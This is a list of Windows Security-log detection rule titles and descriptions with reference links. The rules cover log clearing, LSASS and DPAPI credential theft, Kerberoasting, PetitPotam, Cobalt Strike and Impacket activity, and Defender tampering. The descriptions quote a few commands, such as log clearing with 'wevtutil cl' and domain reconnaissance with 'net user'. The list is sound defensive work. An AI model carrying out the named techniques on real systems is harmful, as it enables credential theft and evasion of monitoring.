Security Eventlog Cleared One of the Windows event logs has been cleared, e.g. caused by "wevtutil cl" command execution https://twitter.com/deviouspolack/status/832535435960209408, https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100, https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml
Processes Accessing the Microphone and Webcam Potential adversaries accessing the microphone and webcam in an endpoint. https://twitter.com/duzvik/status/1269671601852813320, https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072
Failed Code Integrity Checks Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6281
CobaltStrike Service Installations - Security Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement https://www.sans.org/webcasts/119395, https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/, https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/
DCERPC SMB Spoolss Named Pipe Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1, https://dirkjanm.io/a-different-way-of-abusing-zerologon/, https://twitter.com/_dirkjan/status/1309214379003588608
DCOM InternetExplorer.Application Iertutil DLL Hijack - Security Detects a threat actor creating a file named `iertutil.dll` in the `C:\Program Files\Internet Explorer\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Mimikatz DC Sync Detects Mimikatz DC sync security events https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4662
Device Installation Blocked Detects an installation of a device that is forbidden by the system policy https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6423
Windows Event Auditing Disabled Detects scenarios where system auditing (i.e.: Windows event log auditing) is disabled. This may be used in a scenario where an entity would want to bypass local logging to evade detection when Windows event logging is enabled and reviewed. Also, it is recommended to turn off "Local Group Policy Object Processing" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as "gpedit.msc". Please note, that disabling "Local Group Policy Object Processing" may cause an issue in scenarios of one off specific GPO modifications - however, it is recommended to perform these modifications in Active Directory anyways. https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit
Important Windows Event Auditing Disabled Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled. https://docs.google.com/presentation/d/1dkrldTTlN3La-OjWtkWJBb4hVk6vfsSMBFBERs6R8zA/edit, https://github.com/SigmaHQ/sigma/blob/master/documentation/logsource-guides/windows/service/security.md
ETW Logging Disabled In .NET Processes - Registry Potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
DPAPI Domain Backup Key Extraction Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
DPAPI Domain Master Key Backup Attempt Detects anyone attempting a backup of the DPAPI Master Key. This event gets generated at the source and not on the Domain Controller. https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
External Disk Drive Or USB Storage Device Was Recognized By The System Detects external disk drives or plugged-in USB devices. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416
Persistence and Execution at Scale via GPO Scheduled Task Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale https://twitter.com/menasec1/status/1106899890377052160, https://www.secureworks.com/blog/ransomware-as-a-distraction, https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-0-16-1-scheduled-task-execution-at-scale-via-gpo.html
Hidden Local User Creation Detects the creation of a local hidden user account which should not happen for event ID 4720. https://twitter.com/SBousseaden/status/1387743867663958021
HackTool - EDRSilencer Execution - Filter Added Detects execution of EDRSilencer, a tool that abuses the Windows Filtering Platform (WFP) to block the outbound traffic of running EDR agents based on specific hardcoded filter names. https://github.com/netero1010/EDRSilencer
HackTool - NoFilter Execution Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp, https://github.com/deepinstinct/NoFilter, https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation, https://x.com/_st0pp3r_/status/1742203752361128162?s=20
HybridConnectionManager Service Installation Rule to detect the Hybrid Connection Manager service installation. https://twitter.com/Cyb3rWard0g/status/1381642789369286662
Impacket PsExec Execution Detects execution of Impacket's psexec.py. https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Possible Impacket SecretDump Remote Activity Detects AD credential dumping using the Impacket secretsdump hacktool https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html
Invoke-Obfuscation CLIP+ Launcher - Security Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation - Security Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher - Security Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR+ Launcher - Security Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION - Security Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER - Security Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin - Security Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip - Security Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA - Security Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 - Security Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
ISO Image Mounted Detects the mount of an ISO image on an endpoint https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages, https://twitter.com/MsftSecIntel/status/1257324139515269121, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image
Kerberoasting Activity - Initial Query This rule will collect the data needed to start looking into possible kerberoasting activity. Further analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds. You can then set a threshold for the number of requests and time between the requests to turn this into an alert. https://www.trustedsec.com/blog/art_of_kerberoast/, https://adsecurity.org/?p=3513
First Time Seen Remote Named Pipe This detection excludes known named pipes accessible remotely and notifies on newly observed ones; it may help to detect lateral movement and remote execution using named pipes https://twitter.com/menasec1/status/1104489274387451904
LSASS Access From Non System Account Detects potential mimikatz-like tools accessing LSASS from non system account https://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html
Credential Dumping Tools Service Execution - Security Detects well-known credential dumping tools execution via service execution events https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
WCE wceaux.dll Access Detects wceaux.dll access during WCE pass-the-hash remote command execution on the source host https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://jpcertcc.github.io/ToolAnalysisResultSheet
Metasploit SMB Authentication Alerts on Metasploit host's authentications on the domain. https://github.com/rapid7/metasploit-framework/blob/1416b5776d963f21b7b5b45d19f3e961201e0aed/lib/rex/proto/smb/client.rb
Metasploit Or Impacket Service Installation Via SMB PsExec Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation https://bczyz1.github.io/2021/01/30/psexec.html
Meterpreter or Cobalt Strike Getsystem Service Installation - Security Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
NetNTLM Downgrade Attack Detects NetNTLM downgrade attack https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
Windows Network Access Suspicious desktop.ini Action Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk. https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/
New or Renamed User Account with '$' Character Detects the creation of a user with the "$" character. This can be used by attackers to hide a user or trick detection systems that lack the parsing mechanisms. https://twitter.com/SBousseaden/status/1387743867663958021
Denied Access To Remote Desktop This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop. Often, this event can be generated by attackers when searching for available Windows servers in the network. https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825
Password Policy Enumerated Detects when the password policy is enumerated. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4661, https://github.com/jpalanco/alienvault-ossim/blob/f74359c0c027e42560924b5cff25cdf121e5505a/os-sim/agent/src/ParserUtil.py#L951
Windows Pcap Drivers Detects Windows Pcap driver installation based on a list of associated .sys files. https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more
Possible PetitPotam Coerce Authentication Attempt Detect PetitPotam coerced authentication activity. https://github.com/topotam/PetitPotam, https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml
PetitPotam Suspicious Kerberos TGT Request Detects suspicious Kerberos TGT requests. Once an attacker obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes. One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus. This request will generate a 4768 event with some unusual fields depending on the environment. This analytic will require tuning; we recommend filtering Account_Name to the Domain Controller computer accounts. https://github.com/topotam/PetitPotam, https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/, https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml
Possible DC Shadow Attack Detects DCShadow via create new SPN https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48
PowerShell Scripts Installed as Services - Security Detects a PowerShell script installed as a service https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Protected Storage Service Access Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html
RDP over Reverse SSH Tunnel WFP Detects svchost hosting RDP termsvcs communicating with the loopback address https://twitter.com/SBousseaden/status/1096148422984384514, https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx
Register new Logon Process by Rubeus Detects potential use of Rubeus via registered new trusted logon process https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
Service Registry Key Read Access Request Detects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness
Remote PowerShell Sessions Network Connections (WinRM) Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986 https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
Replay Attack Detected Detects possible Kerberos Replay Attack on the domain controllers when "KRB_AP_ERR_REPEAT" Kerberos response is sent to the client https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4649
SAM Registry Hive Handle Request Detects handles requested to SAM registry hive https://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html
SCM Database Handle Failure Detects non-system users failing to get a handle of the SCM database. https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
SCM Database Privileged Operation Detects non-system users performing a privileged operation on the SCM database https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
Potential Secure Deletion with SDelete Detects files that have extensions commonly seen while SDelete is used to wipe files. https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm, https://www.jpcert.or.jp/english/pub/sr/ir_research.html, https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete
Service Installed By Unusual Client - Security Detects a service installed by a client which has PID 0 or whose parent has PID 0 https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html, https://www.x86matthew.com/view_post?id=create_svc_rpc, https://twitter.com/SBousseaden/status/1490608838701166596
Remote Access Tool Services Have Been Installed - Security Detects service installation of different remote access tools software. These software are often abused by threat actors to perform https://redcanary.com/blog/misbehaving-rats/
SMB Create Remote File Admin Share Looks for non-system accounts accessing a file over SMB with write (0x2) access mask via an administrative share (i.e. C$). https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml, https://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file
A New Trust Was Created To A Domain Addition of domains is rare and should be verified for legitimacy. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4706
Win Susp Computer Name Containing Samtheadmin Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool https://twitter.com/malmoeb/status/1511760068743766026, https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py, https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py
Addition of SID History to Active Directory Object An attacker can use the SID history attribute to gain additional privileges. https://adsecurity.org/?p=1772
Password Change on Directory Service Restore Mode (DSRM) Account Detects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence. https://adsecurity.org/?p=1714, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794
Account Tampering - Suspicious Failed Logon Reasons This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625, https://twitter.com/SBousseaden/status/1101431884540710913
Group Policy Abuse for Privilege Addition Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins. https://www.elastic.co/guide/en/security/current/group-policy-abuse-for-privilege-addition.html#_setup_275
Startup/Logon Script Added to Group Policy Object Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects. https://www.elastic.co/guide/en/security/current/startup-logon-script-added-to-group-policy-object.html
Kerberos Manipulation Detects failed Kerberos TGT issue operation. This can be a sign of manipulations of TGT messages by an attacker. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4771
Suspicious LDAP-Attributes Used Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies. https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger
Suspicious Windows ANONYMOUS LOGON Local Account Created Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts. https://twitter.com/SBousseaden/status/1189469425482829824
Password Dumper Activity on LSASS Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN https://twitter.com/jackcr/status/807385668833968128
Suspicious Remote Logon with Explicit Credentials Detects suspicious processes logging on with explicit credentials https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Potentially Suspicious AccessMask Requested From LSASS Detects process handle on LSASS process with certain access mask https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Reconnaissance Activity Detects activity as "net user administrator /domain" and "net group domain admins /domain" https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html
Password Protected ZIP File Opened Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Password Protected ZIP File Opened (Suspicious Filenames) Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Password Protected ZIP File Opened (Email Attachment) Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened. https://twitter.com/sbousseaden/status/1523383197513379841
Uncommon Outbound Kerberos Connection - Security Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. https://github.com/GhostPack/Rubeus
Possible Shadow Credentials Added Detects possible addition of shadow credentials to an active directory object. https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html, https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/, https://twitter.com/SBousseaden/status/1581300963650187264?
Suspicious PsExec Execution Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise if PsExec is used for legitimate purposes, or if an attacker uses a different PsExec client other than the Sysinternals one. https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html
Suspicious Access to Sensitive File Extensions Detects known sensitive file extensions accessed on a network share Internal Research
Suspicious Kerberos RC4 Ticket Encryption Detects service ticket requests using RC4 encryption type https://adsecurity.org/?p=3458, https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity
Suspicious Scheduled Task Creation Detects suspicious scheduled task creation events, based on attributes such as paths, command line flags, etc. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
Important Scheduled Task Deleted/Disabled Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4699, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4701
Suspicious Scheduled Task Update Detects update to a scheduled task event that contain suspicious keywords. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4698
Unauthorized System Time Modification Detect scenarios where a potentially unauthorized application or user is modifying the system time. Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well), Live environment caused by malware, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616
Remote Service Activity via SVCCTL Named Pipe Detects remote service activity via remote access to the svcctl named pipe https://web.archive.org/web/20230329155141/https://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html
SysKey Registry Keys Access Detects handle requests and access operations to specific registry keys to calculate the SysKey https://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html
Sysmon Channel Reference Deletion Potential threat actor tampering with Sysmon manifest and eventually disabling it https://twitter.com/Flangvik/status/1283054508084473861, https://twitter.com/SecurityJosh/status/1283027365770276866, https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html, https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8
Tap Driver Installation - Security Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques. https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers
Suspicious Teams Application Related ObjectAccess Event Detects access to authentication tokens and accounts of the Microsoft Teams desktop application. https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Transferring Files with Credential Data via Network Shares Transferring files with well-known filenames (sensitive files with credential data) using network shares https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
User Added to Local Administrator Group Detects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732, https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers
User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess' The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA. https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
Local User Creation Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs. https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/
Potential Privileged System Service Operation - SeLoadDriverPrivilege Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes which are allowed to do so, you may be left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools, so you have to work with a whitelist to find the bad stuff. https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673
User Logoff Event Detects a user log-off activity. Could be used for example to correlate information during forensic investigations https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4634, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4647
VSSAudit Security Event Source Registration Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy
Windows Defender Exclusion List Modified Detects modifications to the Windows Defender exclusion registry key. This could indicate a potentially suspicious or even malicious activity by an attacker trying to add a new exclusion in order to bypass security. https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Windows Defender Exclusion Deleted Detects when a Windows Defender exclusion has been deleted. This could indicate an attacker trying to delete their tracks by removing the added exclusions https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
T1047 Wmiprvse Wbemcomn DLL Hijack Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
Locked Workstation Detects locked workstation session events that occur automatically after a standard period of inactivity. https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800
WMI Persistence - Security Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs. https://twitter.com/mattifestation/status/899646620148539397, https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
Windows Defender Exclusion Registry Key - Write Access Requested Detects write access requests to the Windows Defender exclusions registry keys. This could be an indication of an attacker trying to request a handle or access the object to write new exclusions in order to bypass security. https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
Admin User Remote Logon Detect remote login by Administrator user (depending on internal pattern). https://car.mitre.org/wiki/CAR-2016-04-005
DiagTrackEoP Default Login Username Detects the default "UserName" used by the DiagTrackEoP POC https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46
A Member Was Removed From a Security-Enabled Global Group Detects activity when a member is removed from a security-enabled global group https://www.cisecurity.org/controls/cis-controls-list/, https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf, https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729, https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633
Potential Access Token Abuse Detects potential token impersonation and theft. Example, when using "DuplicateToken(Ex)" and "ImpersonateLoggedOnUser" with the "LOGON32_LOGON_NEW_CREDENTIALS flag". https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation, https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html
RDP Login from Localhost RDP login with localhost source address may be a tunnelled login https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
Successful Overpass the Hash Attempt Detects successful logon with logon type 9 (NewCredentials), which matches the Overpass the Hash behavior of e.g. Mimikatz's sekurlsa::pth module. https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html
Scanner PoC for CVE-2019-0708 RDP RCE Vuln Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep https://twitter.com/AdamTheAnalyst/status/1134394070045003776, https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708
